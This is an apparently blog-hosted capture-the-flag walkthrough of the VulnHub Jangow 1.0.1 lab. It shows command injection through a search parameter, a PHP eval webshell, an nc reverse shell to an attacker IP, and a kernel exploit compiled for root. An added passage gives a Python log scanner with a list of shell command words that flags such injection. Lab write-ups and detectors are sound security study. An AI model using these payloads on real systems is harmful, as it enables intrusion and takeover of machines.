[VulnHub target] Jangow: 1.0.1
2022-06-10 19:00:00 【Nailaoyyds】
A note on a Kali dual network card problem where the IP is not shown
1. Information gathering
Jangow 1.0.1 target machine IP: 192.168.56.118
Kali attacker IP: 192.168.56.102
The target already has an IP when it boots.

nmap scanning


Get the open ports and services of the target host

2. Web penetration

Look for functional entry points
Enter the site directory and find a functional entry point:
http://192.168.56.118/site/busque.php?buscar=
Try executing the command whoami:
http://192.168.56.118/site/busque.php?buscar=whoami
The command is executed.
Check the password file:
cat /etc/passwd

But this only lets you view files; you cannot log in, so a next step is needed.
Write a one-line webshell
echo '<?php @eval ($_POST["123"]);?>' >>shell.php
Connect with AntSword
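
An added example, not part of the original write-up: a defender-side check that scans web server access logs for the command execution through the buscar parameter shown above. The log lines are constructed, and the rule set and the function names scan and reasons_for are assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in Apache common log format (not taken from the original page).
SAMPLE_LOG = """\
192.168.56.1 - - [10/Jun/2022:18:39:50 +0000] "GET /site/busque.php?buscar=toys+for+cat HTTP/1.1" 200 1
192.168.56.102 - - [10/Jun/2022:18:40:01 +0000] "GET /site/busque.php?buscar= HTTP/1.1" 200 1
192.168.56.102 - - [10/Jun/2022:18:40:09 +0000] "GET /site/busque.php?buscar=whoami HTTP/1.1" 200 9
192.168.56.102 - - [10/Jun/2022:18:40:30 +0000] "GET /site/busque.php?buscar=cat%20/etc/passwd HTTP/1.1" 200 1543
192.168.56.1 - - [10/Jun/2022:18:41:12 +0000] "GET /site/index.html HTTP/1.1" 200 10190
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Assumed heuristics for shell syntax in a search field; tune them to the site's real queries.
RULES = [
    ("shell metacharacter", re.compile(r'[;|&`<>]|\$\(')),
    ("system path", re.compile(r'/(etc|tmp|bin|proc)/')),
    ("leading command word",
     re.compile(r'^\s*(whoami|id|uname|cat|ls|echo|nc|wget|curl|sh|bash)\b')),
]

def reasons_for(value):
    """Return the names of all rules that the decoded parameter value matches."""
    return [name for name, rx in RULES if rx.search(value)]

def scan(log_text, path="/site/busque.php", param="buscar"):
    """Return (ip, timestamp, decoded value, reasons) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlsplit(m["target"])
        if url.path != path:
            continue
        # parse_qsl percent-decodes values, so encoded requests are matched too
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = reasons_for(value) if key == param else []
            if reasons:
                findings.append((m["ip"], m["ts"], value, reasons))
    return findings

if __name__ == "__main__":
    for ip, ts, value, reasons in scan(SAMPLE_LOG):
        print(f"{ts} {ip} buscar={value!r} -> {', '.join(reasons)}")
```

The leading-command-word rule is anchored to the start of the value, so an ordinary search such as "toys for cat" is not flagged while "cat /etc/passwd" is.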

3. Successful exploitation
Search for sensitive files


4. Privilege escalation
Some files cannot be viewed with the current permissions, so escalate privileges.
Reverse shell
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.128 443 >/tmp/f');?>
The reverse shell connects successfully.

Upgrade the shell to an interactive one
python3 -c 'import pty;pty.spawn("/bin/bash")'
uname -a
Get the version number
Privilege escalation
Search by system version:
searchsploit ubuntu 4.4.0
Use the file 45010.c for privilege escalation.
Upload the file to the target machine with AntSword.
Download link:
https://gitee.com/jewels/Privilege-Escalation/repository/archive/master.zip 
Upload with AntSword
gcc 45010.c -o exp   # build the executable
chmod +x exp         # add execute permission
./exp                # run the exp file

Enter the root directory
Find the file


5. Get the flag

